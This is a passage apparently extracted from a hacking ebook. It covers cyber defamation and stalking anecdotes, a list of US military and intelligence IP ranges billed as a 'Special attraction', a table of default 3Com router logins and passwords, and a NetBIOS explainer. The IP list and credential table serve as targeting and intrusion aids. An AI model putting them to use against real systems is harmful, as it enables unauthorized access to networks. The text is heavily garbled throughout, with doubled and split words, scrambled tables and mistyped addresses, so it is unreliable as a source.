information
to
all
of
that
person's
friends.
In a recent occurrence, Surekha (names of people have been changed), a young girl was about to be married to Suraj. She was really pleased because despite it being an arranged marriage, she had liked the boy. He had seemed to be open-minded and pleasant. Then, one day when she met Suraj, he looked worried and even a little upset. He was not really interested in talking to her. When asked he told her that, members of his family had been receiving e-mails that contained malicious things about Surekha's character. Some of them spoke of affairs, which she had had in the past. He told her 168 16 8 that, his parents were justifiably very upset and were also considering breaking off the engagement. Fortunately, Suraj was able to prevail upon his parents and the other elders of his house to approach the police instead of blindly believing what was contained in the mails.During investigation, it was revealed that the person sending those e-mails was none other than Surekha's stepfather. He had sent these emails so as to break up the marriage. The girl's marriage would have caused him to lose control of her property of which he was the guardian till she got married. Another famous case of cyber defamation occurred in America. All friends and relatives of a lady were beset with obscene e-mail messages appearing to originate from her account. These mails were giving the lady in question a bad name among her friends. The lady was an activist against pornography pornography.. In reality, reality, a group of people displeased displeased with her views and angry with her for opposing them had decided to get back at her by using such underhanded methods. In additio addition n to sendin sending g spoofe spoofed d obscen obscenee e-mail e-mailss they also put up websit websites es about about her, her, that that basically maligned her character and sent e-mails to her family and friends containing matter defaming her.
Cyber stalking The Oxford dictionary defines stalking as "pursuing stealthily". Cyber stalking nvolves following a person's movements across the Internet by posting messages (sometimes threat threateni ening) ng) on the bullet bulletin in boards boards freque frequented nted by the victim, victim, enteri entering ng the chat-ro chat-rooms oms frequented by the victim, constantly bombarding the victim with emails etc.
65
Back
66
67
Index •
•
•
•
IP Address Default Router Password Net BIOS Mobile Hacking
Back
68
Special attraction Government, military and intelligence IP range. RANGE 6 6.* - Army Information Systems Center RANGE 7 7.*.*.* Defense Information Systems Agency, VA RANGE 11 11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington Washington DC RANGE 21 21. - US Defense Information Systems Agency RANGE 22 22.* - Defense Information Systems Agency RANGE 24 24.198.*.* RANGE 25 25.*.*.* Royal Signals and Radar Rada r Establishment, UK RANGE 26 26.* - Defense Information Systems Agency RANGE 29 29.* - Defense Information Systems Agency RANGE 30 30.* - Defense Information Systems Agency
69
RANGE 49 49.* - Joint Tactical Tactical Command RANGE 50 50.* - Joint Tactical Tactical Command RANGE 55 55.* - Army National Guard Bureau
RANGE 128 128.51.0.0 Department of Defense 128.56.0.0 U.S. Naval Academy 128.60.0.0 Naval Research Laboratory 128.63.0.0 Army Ballistics Research Laboratory 128.80.0.0 Army Communications Electronics Command 128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency 128.102.0.0 NASA Ames Research Center 128.149.0.0 NASA Headquarters 128.154.0.0 NASA Wallops Wallops Flight Facility 128.155.0.0 NASA Langley Research Center 128.156.0.0 NASA Lewis Network Control Center 128.157.0.0 NASA Johnson Space Center 128.158.0.0 NASA Ames Research Center 128.159.0.0 NASA Ames Research Center 128.160.0.0 Naval Research Laboratory 128.161.0.0 NASA Ames Research Center 128.183.0.0 NASA Goddard Space Flight Center 128.190.0.0 Army Belvoir Reasearch and Development Center 128.202.0.0 50th Space Wing 128.216.0.0 MacDill Air Force Base 128.236.0.0 U.S. Air Force Academy RANGE 129 129.23.0.0
Strategic Defense Initiative Organization 70
129.29.0.0
United States Military Academy
129.50.0.0
NASA Marshall Space Flight Center
129.51.0.0
Patrick Air Force Base
129.52.0.0
Wright-Patterson Wright-Patterson Air Force Base
129.165.0.0
NASA Goddard Space Flight Center
129.166.0.0
NASA - John F. Kennedy Space Center
129.167.0.0
NASA Marshall Space Flight Center
129.168.0.0
NASA Lewis Research Center
129.190.0.0
Naval Underwater Systems Center
129.198.0.0
Air Force Flight Test Center
129.209.0.0
Army Ballistics Research Laboratory
129.229.0.0
U.S. Army Corps of Engineers
129.251.0.0
United States Air Force Academy
RANGE 130 130.40.0.0
NASA Johnson Space Center
130.90.0.0
Mather Air Force Base
130.109.0.0
Naval Coastal Systems Center
130.114.0.0
Army Aberdeen Proving Ground Installation Support Activity
130.124.0.0
Honeywell Defense Systems Group
130.165.0.0
U.S.Army Corps of Engineers
130.167.0.0
NASA Headquarters
RANGE 131 131.6.0.0
Langley Air Force Base
131.10.0.0
Barksdale Air Force Base
131.17.0.0
Sheppard Air Force Base
131.21.0.0
Hahn Air Base
131.22.0.0
Keesler Air Force Base
131.24.0.0
6 Communications Squadron
131.25.0.0
Patrick Air Force Base
131.32.0.0
37 Communications Squadron
131.35.0.0
Fairchild Air Force Base 71
131.36.0.0
Yokota Air Base
131.37.0.0
Elmendorf Air Force Base
131.38.0.0
Hickam Air Force Base
131.39.0.0
354CS/SCSN
131.40.0.0
Bergstrom Air Force Base
131.44.0.0
Randolph Air Force Base
131.46.0.0
20 Communications Squadron
131.47.0.0
Andersen Air Force Base
131.50.0.0
Davis-Monthan Air Force Base
131.52.0.0
56 Communications Squadron /SCBB
131.54.0.0
Air Force Concentrator Network
131.56.0.0
Upper Heyford Air Force Base
131.58.0.0
Alconbury Royal Air Force Base
131.59.0.0
7 Communications Squadron
131.61.0.0
McConnell Air Force Base
131.62.0.0
Norton Air Force Base
131.74.0.0
Defense MegaCenter Columbus
131.84.0.0
Defense Technical Information Center
131.92.0.0
Army Information Systems Command - Aberdeen (EA)
131.105.0.0
McClellan Air Force Base
131.110.0.0
NASA/Michoud Assembly Facility
131.120.0.0
Naval Postgraduate School
131.121.0.0
United States Naval Academy
131.122.0.0
United States Naval Academy
131.176.0.0
European Space Operations Center
131.182.0.0
NASA Headquarters
131.250.0.0
Office of the Chief of Naval Research
RANGE 132 132.3.0.0
Williams Williams Air Force Base
132.6.0.0
Ankara Air Station
132.9.0.0
28th Bomb Wing
132.10.0.0
319 Comm Sq
132.11.0.0
Hellenikon Air Base 72
132.12.0.0
Myrtle Beach Air Force Base
132.13.0.0
Bentwaters Royal Air Force Base
132.14.0.0
Air Force Concentrator Network
132.15.0.0
Kadena Air Base
132.16.0.0
Kunsan Air Base
132.17.0.0
Lindsey Air Station
132.18.0.0
McGuire Air Force Base
132.20.0.0
35th Communications Squadron
132.21.0.0
Plattsburgh Air Force Base
132.22.0.0
23Communications Sq
132.24.0.0
Dover Air Force Base
132.30.0.0
Lajes Air Force Base
132.31.0.0
Loring Air Force Base
132.34.0.0
Cannon Air Force Base
132.35.0.0
Altus Air Force Base
132.38.0.0
Goodfellow AFB
132.39.0.0
K.I. Sawyer Air Force Base
132.42.0.0
Spangdahlem Air Force Base
132.43.0.0
Zweibruchen Air Force Base
132.45.0.0
Chanute Air Force Base
132.46.0.0
Columbus Air Force Base
132.48.0.0
Laughlin Air Force Base
132.50.0.0
Reese Air Force Base
132.52.0.0
Vance Air Force Base
132.54.0.0
Langley AFB
132.55.0.0
Torrejon Air Force Base
132.57.0.0
Castle Air Force Base
132.58.0.0
Nellis Air Force Base
132.59.0.0
24Comm Squadron\SCSNA
132.61.0.0
SSG/SIN
132.79.0.0
Army National Guard Bureau
132.82.0.0
Army National Guard Bureau
132.86.0.0
National Guard Bureau
132.94.0.0
Army National Guard Bureau 73
132.109.0.0
National Guard Bureau
132.114.0.0
Army National Guard
132.117.0.0
Army National Guard Bureau
132.122.0.0
South Carolina Army National Guard, USPFO
132.133.0.0
National Guard Bureau
132.159.0.0
Army Information Systems Command
132.193.0.0
Army Research Office
132.250.0.0
Naval Research Laboratory
RANGE 134 134.5.0.0 Lockheed Aeronautical Systems Company 134.11.0.0
The Pentagon
134.12.0.0
NASA Ames Research Center
134.51.0.0
Boeing Military Aircraft Facility
134.52.*.*
Boeing Corporation
134.78.0.0
Army Information Systems Command-ATCOM Command-ATCOM
134.80.0.0
Army Information Systems Command
134.118.0.0
NASA/Johnson Space Center
134.131.0.0
Wright-Patterson Wright-Patterson Air Force Base
134.136.0.0
Wright-Patterson Wright-Patterson Air Force Base
134.164.0.0
Army Engineer Waterways Experiment Station
134.165.0.0
Headquarters Air Force Space Command
134.194.0.0
U.S. Army Aberdeen Test Center
134.205.0.0
7th Communications Group
134.229.0.0
Navy Regional Data Automation Center
134.232.0.0 - 134.232.255.255
U.S. Army, Army, Europe
134.233.0.0
HQ 5th Signal Command
134.235.0.0
HQ 5th Signal Command
134.240.0.0
U.S. Military Academy
136.149.0.0
Air Force Military Personnel Center
RANGE 136 136.178.0.0
NASA Research Network
136.188.0.0 - 136.197.255.255 136.207.0.0
Defense Intelligence Agency
69th Signal Battalion 74
136.208.0.0
HQ, 5th Signal Command
136.209.0.0
HQ 5th Signal Command
136.210.0.0
HQ 5th Signal Command
136.212.0.0
HQ 5th Signal Command
136.213.0.0
HQ, 5th Signal Command
136.214.0.0
HQ, 5th Signal Command
136.215.0.0
HQ, 5th Signal Command
136.216.0.0
HQ, 5th Signal Command
136.217.0.0
HQ, 5th Signal Command
136.218.0.0
HQ, 5th Signal Command
136.219.0.0
HQ, 5th Signal Command
136.220.0.0
HQ, 5th Signal Command
136.221.0.0
HQ, 5th Signal Command
136.222.0.0
HQ, 5th Signal Command
RANGE 137 137.1.0.0 37.2.0.0 137.3.0.0
Whiteman Air Force Base George Air Force Base Little Rock Air Force Base \
137.4.0.0 - 137.4.255.255
437 CS/SC
137.5.0.0
Air Force Concentrator Network
137.6.0.0
Air Force Concentrator Network
137.11.0.0
HQ AFSPC/SCNNC
137.12.0.0
Air Force Concentrator Network
137.17.* National Aerospace Laboratory 137.24.0.0
Naval Surface Warfare Center
137.29.0.0
First Special Operations Command
137.67.0.0
Naval Warfare Assessment Center
137.94.* Royal Military College 137.95.* Headquarters, U.S. European Command 137.126.0.0
USAF MARS
137.127.* Army Concepts Analysis Agency 137.128.* U.S. ARMY Tank-Automotive Tank-Automotive Command 75
137.130.0.0
Defense Information Systems Agency
137.209.0.0
Defense Information Systems Agency
137.210.0.0
Defense Information Systems Agency
137.211.0.0
Defense Information Systems Agency
137.212.0.0
Defense Information Systems Agency
137.231.0.0
HQ 5th Signal Command
137.232.0.0
Defense Information Systems Agency
137.233.0.0
Defense Information Systems Agency
137.234.0.0
Defense Information Systems Agency
137.235.0.0
Defense Information Systems Agency
137.240.0.0
Air Force Materiel Command
137.241.0.0
75 ABW
137.242.0.0
Air Force Logistics Command
137.243.0.0
77 CS/SCCN
137.244.0.0
78 CS/SCSC
137.245.0.0
Wright Wright Patterson Air Force Base
137.246.0.0
United States Atlantic Command Joint Training
RANGE 139 39.31.0.0
20th Tactical Fighter Wing
139.32.0.0
48th Tactical Fighter Wing
139.33.0.0
36th Tactical Fighter Wing
139.34.0.0
52nd Tactical Fighter Wing
139.35.0.0
50th Tactical Fighter Wing
139.36.0.0
66th Electronic Combat Wing
139.37.0.0
26th Tactical Reconnaissance Wing |
139.38.0.0
32nd Tactical Fighter Squadron
139.40.0.0
10th Tactical Fighter Wing
139.41.0.0
39th Tactical Air Control Group
139.42.0.0
40th Tactical Air Control Group
139.43.0.0
401st Tactical Fighter Wing
139.124.* Reseau Infomratique 76
RANGE 143 143.45.0.0
58th Signal Battalion
143.46.0.0
U.S. Army, Army, 1141st Signal Battalion
143.68.0.0
Headquarters, USAISC
143.69.0.0
Headquarters, USAAISC
143.70.0.0
Headquarters, USAAISC
143.71.0.0
Headquarters, USAAISC
143.72.0.0
Headquarters, USAAISC
143.73.0.0
Headquarters, USAAISC
143.74.0.0
Headquarters, USAAISC
143.75.0.0
Headquarters, USAAISC
143.76.0.0
Headquarters, USAAISC
143.77.0.0
Headquarters, USAAISC
143.78.0.0
Headquarters, USAAISC
143.79.0.0
Headquarters, USAAISC
143.80.0.0
Headquarters, USAAISC
143.81.0.0
Headquarters, USAAISC
143.82.0.0
Headquarters, USAAISC
143.84.0.0
Headquarters, USAAISC
143.85.0.0
Headquarters, USAAISC
143.86.0.0
Headquarters, USAAISC
143.87.0.0
Headquarters, USAAISC
143.232.0.0
NASA Ames Research Center
RANGE 144 144.99.0.0
United States Army Information Systems Command
144.109.0.0
Army Information Systems Command
144.143.0.0
Headquarters, Third United States Army
144.144.0.0
Headquarters, Third United States Army
144.146.0.0
Commander, Army Information Systems Center
144.147.0.0
Commander, Army Information Systems Center
144.170.0.0
HQ, 5th Signal Command
144.192.0.0
United States Army Information Services Command-Campbell
144.233.0.0
Defense Intelligence Agency 77
144.234.0.0
Defense Intelligence Agency
144.235.0.0
Defense Intelligence Agency
144.236.0.0
Defense Intelligence Agency
144.237.0.0
Defense Intelligence Agency
144.238.0.0
Defense Intelligence Agency
144.239.0.0
Defense Intelligence Agency
144.240.0.0
Defense Intelligence Agency
144.241.0.0
Defense Intelligence Agency
144.242.0.0
Defense Intelligence Agency
144.252.0.0
U.S. Army LABCOM
RANGE 146 146.17.0.0
HQ, 5th Signal Command
146.80.0.0
Defence Research Agency
146.98.0.0
HQ United States European Command
46.154.0.0
NASA/Johnson Space Center
146.165.0.0
NASA Langley Research Center
RANGE 147 147.35.0.0
HQ, 5th Signal Command
147.36.0.0
HQ, 5th Signal Command
147.37.0.0
HQ, 5th Signal Command
147.38.0.0
HQ, 5th Signal Command
147.39.0.0
HQ, 5th Signal Command
147.40.0.0
HQ, 5th Signal Command
147.42.0.0
Army CALS Project
147.103.0.0
Army Information Systems Software Center
147.104.0.0
Army Information Systems Software Center
147.159.0.0
Naval Air Warfare Center, Aircraft Division
147.168.0.0
Naval Surface Warfare Center
147.169.0.0
HQ, 5th Signal Command
147.198.0.0
Army Information Systems Command
147.199.0.0
Army Information Systems Command
47.238.0.0
Army Information Systems Command 78
147.239.0.0
1112th 1112th Signal Battalion
147.240.0.0
US Army Tank-Automotive Command
147.242.0.0
19th Support Command
147.248.0.0
Fort Monroe DOIM
147.254.0.0
7th Communications Group
RANGE 148 148.114.0.0
NASA, Stennis Space Center
RANGE 150 150.113.0.0
1114th Signal Battalion
150.114.0.0
1114th Signal Battalion
150.125.0.0
Space and Naval Warfare Command
150.133.0.0
10th Area Support Group
150.144.0.0
NASA Goodard Space Flight Center
150.149.0.0
Army Information Systems Command
150.157.0.0
USAISC-Fort Lee
150.184.0.0
Fort Monroe DOIM
150.190.0.0
USAISC-Letterkenny
150.196.0.0
USAISC-LABCOM
RANGE 152 152.82.0.0
7th Communications Group of the Air Force
152.151.0.0
U.S. Naval Space & Naval Warfare Systems Command
152.152.0.0
NATO NATO Headquarters
152.154.0.0
Defense Information Systems Agency
152.229.0.0
Defense MegaCenter (DMC) Denver
RANGE 153 153.21.0.0
USCENTAF/SCM
153.22.0.0
USCENTAF/SCM
153.28.0.0
USCENTAF/SCM
153.29.0.0
USCENTAF/SCM
153.30.0.0
USCENTAF/SCM 79
153.31.0.0
Federal Bureau of Investigation
RANGE 155 155.5.0.0
1141st Signal Bn
155.6.0.0
1141st Signal Bn
155.77.0.0
PEO STAMIS STAMIS
155.78.0.0
PEO STAMIS STAMIS
155.79.0.0
US Army Corps of Engineers
155.80.0.0
PEO STAMIS STAMIS
155.81.0.0
PEO STAMIS STAMIS
155.82.0.0
PEO STAMIS STAMIS
155.83.0.0
US Army Corps of Enginers
155.84.0.0
PEO STAMIS STAMIS
155.85.0.0
PEO STAMIS STAMIS
155.86.0.0
US Army Corps of Engineers
155.87.0.0
PEO STAMIS STAMIS
155.88.0.0
PEO STAMIS STAMIS
155.96.0.0
Drug Enforcement Administration
155.149.0.0
1112th 1112th Signal Battalion
155.155.0.0
HQ, 5th Signal Command \
155.178.0.0
Federal Aviation Administration
155.213.0.0
USAISC Fort Benning
155.214.0.0
Director of Information Management
155.215.0.0
USAISC-FT DRUM
155.216.0.0
TCACCIS Project Management Office
155.217.0.0
Directorate of Information Management
155.218.0.0
USAISC
155.219.0.0
DOIM/USAISC Fort Sill
155.220.0.0
USAISC-DOIM
155.221.0.0
USAISC-Ft Ord
RANGE 156 156.9.0.0
U. S. Marshals Service
80
RANGE 158 158.1.0.0
Commander, Tooele Army Depot
58.2.0.0
USAMC Logistics Support Activity
158.3.0.0
U.S. Army TACOM
158.6.0.0
USAISC-Ft. McCoy
158.8.0.0
US Army Soldier Support Center
158.9.0.0
USAISC-CECOM
158.10.0.0
GOC
158.11.0.0
UASISC-Vint UASISC-Vint Hill
158.12.0.0
US Army Harry Diamond Laboratories
158.13.0.0
USAISC DOIM
158.14.0.0
1112th 1112th Signal Battalion
158.16.0.0
Rocky Mountain Arsenal (PMRMA)
158.17.0.0
Crane Army Ammunition Activity
158.18.0.0
Defense Finance & Accounting Service Center
158.19.0.0
DOIM
158.20.0.0
DOIM
158.235.0.0
Marine Corps Central Design and Programming Activity
158.243.0.0
Marine Corps Central Design and Programming Activity
158.244.0.0
Marine Corps Central Design and Programming Activity
158.245.0.0
Marine Corps Central Design and Programming Activity
158.246.0.0
Marine Corps Central Design and Programming Activity
RANGE 159 159.120.0.0
Naval Air Systems Command (Air 4114)
RANGE 160 160.132.0.0
US Army Recruiting Command
|160.135.0.0
36th Signal BN
160.138.0.0
USAISC
160.139.0.0
USAISC
160.140.0.0
HQ, United States Army
160.143.0.0
USAISC 81
160.145.0.0
1101st Signal Brigade
160.146.0. 160.1 46.0.0 0
USAISC SATCOMSTA-CAMP SATCOMSTA-CAMP ROBERTS
160.150.0.0
Commander, Moncrief Army Hospital
RANGE 161 161.124.0. 161.1 24.0.0 0
NAV NAVAL WEAPONS STATION STATION
RANGE 162 162.32.0.0
Naval Aviation Depot Pensacola
162.45.0.0
Central Intelligence Agency
162.46.0.0
Central Intelligence Agency |
RANGE 163 163.205.0.0
NASA Kennedy Space Center
163.206.0.0
NASA Kennedy Space Center
RANGE 164 164.45.0.0
Naval Ordnance Center, Pacific Division
164.49.0.0
United States Army Space and Strategic Defense
164.158.0.0
Naval Surface Warfare Center
164.217.0.0
Institute for Defense Analyses
164.223.0.0
Naval Undersea Warfare Center \
164.224.0.0
Secretary of the Navy
164.225.0.0
U.S. Army Intelligence and Security Command
164.226.0.0
Naval Exchange Service Command
164.227.0.0
Naval Surface Warfare Center, Crane Division
164.228.0.0
USCINCPAC USCINCPAC J21T
164.229.0.0
NCTS-NOLA
164.230.0.0
Naval Aviation Depot
164.231.0.0
Military Sealift Command
RANGE 167 167.44.0.0
Government Telecommunications Agency 82
RANGE 168 168.68.0.0
USDA Office of Operations
168.85.0.0
Fort Sanders Alliance
168.102.0.0
Indiana Purdue Fort Wayne
RANGE 169 169.252.0.0 - 169.253.0.0
U.S. Department of State
RANGE 195 195.10.* Various Various - Do not scan
RANGE 199 199.121.4.0 - 199.121.253.0 Naval Nav al Air Systems Command, VA VA
RANGE 203 203.59.0.0 - 203.59.255.255 203.59.255 .255 Perth Australia iiNET
RANGE 205 205.0.0.0 - 205.117.255.0 2 05.117.255.0 Department of the Navy, Navy, Space and Naval Warfare System Command, Comman d, Washington DC - SPAW SPAWAR 205.96.* - 205.103.* RANGE 207 207.30.* Sprint/United Telephone of Florida
Back
83
Default Router Password
84
Manufacturer
Model
OS Version Login
Password
3Com
-
1.25
root
letmein
3Com
Super Stack 2 Switch Any Acce Access ssBu Buil ilde der® r® 7000 7000 Any BRI
manager
manager
-
-
3Com
CoreBuilder 2500
-
-
-
3Com
Switch 3000/3300
-
manager
manager
3Com
Switch 3000/3300
-
admin
admin
3Com
Switch 3000/3300
-
security
security
3Com
Cable
3com
Managment Win2000 & Syste System m SQL Data Databa base se DOCSIS_APP MS (DOSCIC DHCP)
3com
3Com
NAC NAC (Netw (Networ ork k Acce Access ss Card)
adm
none
3Com
HiPer ARC Card
of adm
none
3Com
CoreBuilder 6000
-
debug
tech
3Com
CoreBuilder 7000
-
tech
tech
3Com 3Com
Supe SuperS rSta tack ck
HA
II
Swit Switch ch -
debug
synnet
II
Swit Switch ch -
tech
tech
2200 Supe SuperS rSta tack ck
v4.1.x
2700
3Com
SuperStack / CoreBuilder -
admin
-
3Com
SuperStack / CoreBuilder -
read
-
3Com
SuperStack / CoreBuilder -
write
-
3Com
LinkSwitch and CellPlex -
tech
tech
3Com
LinkSwitch and CellPlex -
debug
synnet
3com
Superstack II 3300FX
-
admin
-
3com
Switch 3000/3300
-
Admin
3com
3com
3comCellPlex7000
-
tech
tech
3Com
Switch 3000/3300
-
monitor
monitor
3Com
AirConnect Access Point n/a
-
comcomcom
security
security
3com 3Com 3Com 3com
Superstack II Dual Speed
-
500 OfficeConnect 5x1 Sup SuperSt erStac ack k
3
at least 5.x Swi Switch tch
3300XM Super Stack 2 Switch
-
admin
-
Any
manager
manager
II
Swit Switch ch -
manager
manager
II
Swit Switch ch -
security
security
super stack 2 switch any Offic Officee Connec Connectt Remote Remote 812
manager
manager
root
!root
3Com
Switch 3000/3300
-
admin
3COM
OCR-812
-
root
!root
3com
-
-
-
-
3com
N BX 1 0 0
administrator
0000
3com
Home Connect
2.8 85 -
User
Password
3Com
OfficeConnect 5x1
at least 5.x estheralastruey
3Com 3Com 3com 3Com
Supe SuperS rSta tack ck
PASSWORD
1100 Supe SuperS rSta tack ck 1100
admin
-
Back
86
Understanding NetBIOS Whats is NetBIOS? NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applica applicatio tions. ns. In its strict strictest est sense, sense, NetBIO NetBIOS S is an interf interface ace specif specifica icatio tion n for acessi acessing ng networking services. NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. LAN. NetBIO NetBIOS S has now been extended extended to allow allow program programss writte written n using using the NetBIO NetBIOS S interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs. It offe offers rs netw networ ork k appl applic icat atio ions ns a set set of "hook "hooks" s" to carry carry out inte interr-app appli licat catio ion n communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the netw networ ork. k. Its Its inte intent ntio ion n is to isol isolat atee appl applic icat atio ion n prog progra rams ms from from any type type of hard hardwa ware re dependa dependancie ncies. s. It also also spares spares softwa software re develop developers ers the task task of develop developing ing networ network k error error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them. NetBI NetBIOS OS standar standardize dizess the interf interface ace betwee between n applica applicatio tions ns and a LANs LANs operat operating ing capabilities. With With this, it can be specified to which levels of the OSI model the application can write write to, making making the applic applicati ation on transp transport ortabl ablee to other other networ networks. ks. In a NetBIO NetBIOS S LAN enviroment, enviroment, computers computers are known known on the system by a name. Each computer on the network network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below. below. PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer computer to communicate communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these these datagr datagram am or broadca broadcast st method methods. s. However However,, datagr datagram am commun communica icatio tion n allows allows for communication without having to establish a session. 87
All communication in these enviroments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively. Net NetBI BIOS OS is a very very commo common n prot protoc ocol ol used used in today todayss envir envirom omen ents ts.. NetB NetBIO IOS S is supported supported on Ethernet, Ethernet, TokenRi TokenRing, ng, and IBM PC Networks. Networks. In its original induction, induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time. In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both both suppor supported ted.. It suppor supports ts both both broadc broadcast astss and multic multicast asting ing and suppor supports ts three three distin distinct ct services: Naming, Session, and Datagram.
NetBIOS Names NetBIOS names are used to identify resources on a network. Applications use these name namess to star startt and and end end sess sessio ions ns.. You can can confi configu gure re a singl singlee machi machine ne with with mult multip iple le appl applic icat atio ions ns,, each each of whic which h has has a uniq unique ue NetB NetBIO IOS S name. name. Each Each PC that that suppo support rtss an application also has a NetBIOS station station name that is user user defined or that NetBIOS NetBIOS derives by internal means. NetBI NetBIOS OS can consist consist of up to 16 aplhanu aplhanumer meric ic charac character ters. s. The combina combinatio tion n of characters characters must be unique within within the entire entire source routing routing network. Before Before a PC that uses NetBIOS can fully function on a network, ne twork, that PC must register their NetBIOS name. When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows: 1. Uppon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information. 2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name. 3. If no other client on the network objects to the name registration, the client will finish the registration process. There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all
88
processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by b y that node. The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service. [QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above] Thee foll Th follow owin ing g is a tabl tablee of NetB NetBIO IOS S suf suffixe fixess curr curren entl tly y used used by Micr Micros osof oftt WindowsNT. WindowsNT. These suffixes are displayed in hexadecimal hexad ecimal format.
Name
Number
Type
Usage
================================================================== ========
00
U
Workstation Service
01
U
Messenger Service
<\\_MSBROWSE_> 01
G
Master Browser
03
U
Messenger Service
06
U
RAS Server Service
1F
U
NetDDE Service
20
U
File Server Service
21
U
RAS Client Service
22
U
Exchange Interchange
23
U
Exchange Store
24
U
Exchange Directory
30
U
Modem Sharing Server Service
31
U
Modem Sharing Client Service
43
U
SMS Client Remote Control
44
U
SMS Admin Remote Control Tool
45
U
SMS Client Remote Chat
46
U
SMS Client Remote Transfer
4C
U
DEC Pathworks TCPIP Service 89
52
U
DEC Pathworks TCPIP Service
87
U
Exchange MTA
6A
U
Exchange IMC
BE
U
Network Monitor Agent
BF
U
Network Monitor Apps
03
U
Messenger Service
00
G
Domain Name
1B
U
Domain Master Browser
1C
G
Domain Controllers
1D
U
Master Browser
1E
G
Browser Service Elections
1C
G
Internet Information Server
00
[2B]
IRISMULTICAST
U U
[2F]
Internet Information Server Lotus Notes Server
G
Lotus Notes
IRISNAMESERVER [33]
G
Lotus Notes
Forte_$ND800ZA
U
DCA Irmalan Gateway Service
[20]
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique. Group (G): A normal group; the single name may ma y exist with many IP addresses. Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25. Internet Internet Group (I): This is a special configuration configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0 For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
90
NetBIOS Sessions The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the the two two stati station ons. s. One One appl applic icat atio ion n must must have have issu issued ed a List Listen en comm command and when when anoth another er application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a sess sessio ion n part partne nerr.
If the the recei receive verr (lis (liste tene ner) r) is not not alre already ady liste listeni ning ng,, the the Call Call will will be
unsucce unsuccess ssful ful.. If the call call is succes successfu sful, l, each applic applicati ation on receiv receives es notifi notificat cation ion of sessio session n establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams Data Datagr gram amss
can be sent sent to a speci specifi ficc name, name, sent to all member memberss of a group group,, or
broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded. The Send_Br Send_Broadc oadcast ast_Da _Datag tagram ram comman command d sends sends the messag messagee to every every NetBIO NetBIOS S system on the local network. When a broadcast datagram is received by a NetBIOS node, every every proces processs that that has issued issued a Receive Receive_Br _Broad oadcas cast_D t_Data atagra gram m comman command d receive receivess the datagr datagram. am. If none of these these commands commands are outsta outstandin nding g when when the broadca broadcast st datagr datagram am is received, the datagram is discarded. NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBI NetBIOS OS does does not actual actually ly manipu manipulat latee the data. data. The NetBIO NetBIOS S specif specifica icatio tion n define definess an interf interface ace to the networ network k protoc protocol ol used used to reach reach those those servic services, es, not the protoc protocol ol itself itself.. Historically, has been paired with a network protocol called NetBEUI (network extended user 91
interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different. Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
